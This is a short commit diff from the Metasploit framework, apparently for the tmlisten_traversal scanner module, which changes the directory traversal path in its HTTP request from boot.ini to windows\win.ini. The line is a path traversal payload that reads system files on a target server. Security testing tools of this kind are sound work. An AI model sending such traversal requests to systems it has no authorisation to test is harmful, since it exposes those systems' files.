Update tmlisten_traversal

bug/bundler_fix
sinn3r 2014-09-06 01:18:11 -05:00
parent 08ce278cca
commit 44b9dc9b28
1 changed files with 1 additions and 1 deletions

View File

@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
res = send_request_raw(
{
'uri' => '/activeupdate/../../../../../../../../../../../boot.ini',
'uri' => '/activeupdate/../../../../../../../../../../../windows\\win.ini',
'method' => 'GET',
}, 20)